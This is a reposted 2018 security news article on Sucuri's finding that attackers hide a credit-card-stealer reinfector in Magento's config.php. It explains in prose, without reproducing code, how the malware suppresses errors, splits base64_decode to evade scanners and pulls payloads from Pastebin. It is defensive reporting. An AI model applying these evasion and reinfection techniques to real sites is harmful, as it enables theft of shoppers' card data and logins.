[BreachExchange] Magento Hackers Using Simple Evasion Trick to Reinfect Sites With Malware

[Destry Winant]

https://thehackernews.com/2018/06/magento-security-hacking.html

Security researchers have been warning of a new trick that
cybercriminals are leveraging to hide their malicious code designed to
re-introduce the infection to steal confidential information from
Magento based online e-commerce websites.

So, if you have already cleaned up your hacked Magento website, there
are chances your website is still leaking login credentials and credit
card details of your customers to hackers.

More than 250,000 online stores use open-source Magento e-commerce
platform, which makes them an enticing target for hackers, and
therefore the security of both your data and your customer data is of
the utmost importance.

According to the researchers at Sucuri, who have previously spotted
several Magento malware campaigns in the wild, cybercriminals are
currently using a simple yet effective method to ensure that their
malicious code is added back to a hacked website after it has been
removed.

To achieve this, criminals are hiding their 'credit card stealer
reinfector' code inside the default configuration file (config.php) of
Magento website, which gets included on the main index.php and loads
with every page view, eventually re-injecting the stealer code into
multiple files of the website.

Since config.php file gets automatically configured while installing
Magento CMS, usually it is not recommended for administrators or
website owners to change the content of this file directly.

Here's How Magento's Reinfector Code Works

The reinfector code spotted by researchers is quite interesting as it
has been written in a way that no security scanner can easily identify
and detect it, as well as it hardly looks malicious for an untrained
eye.

Hackers have added 54 extra lines of code in the default configuration
file. Here below, I have explained the malicious reinfector code
line-by-line, shown in the screenshots, written inside the default
config.php file.

At line no. 27, attackers set error_reporting() function to false in
an attempt to hide errors messages that could reveal the path of the
malicious module to site admins.

>From line no. 31 to 44, there's a function called patch() that has
been programmed to append the malicious code for stealing confidential
information into legitimate Magento files.

This patch() function uses 4 arguments, values of which defines the
path of a folder, name of a specific file resides in that path needs
to be infected, file size required to check if it is necessary to
reinfect the given file, a new file name to be created, and a remote
URL from where the malicious code will be downloaded in real-time and
injected into the targeted file.

>From line 50 to 51, attackers have smartly split up the
base64_decode() function in multiple parts in order to evade detection
from security scanners.

The line 52 includes a base64 encoded value that converts to
"http://pastebin.com/raw/" after getting decoded using the function
defined in line 50-51.

The next four sets of variables from line 54 to 76 define the four
values required to pass arguments to the patch() function mentioned
above.

The last line of each set includes a random eight character value that
concatenated with the link variable encoded in line 52, which
eventually generates the final URL from where the patch() function
will download the malicious code hosted on remote Pastebin website.

>From line 78 to 81, attacker finally executes patch() function four
times with different values defined in line 54-76 to reinfect website
with the credit card stealer.

"As a rule of thumb, on every Magento installation where a compromise
is suspected to have taken place, the /includes/config.php should be
verified quickly," researchers advise.

It should be noted that similar technique can also be used against
websites based on other content management system platforms such as
Joomla and WordPress to hide malicious code.

Since attackers mostly exploit known vulnerabilities to compromise
websites at the very first place, users are always recommended to keep
their website software and servers updated with the latest security
patches.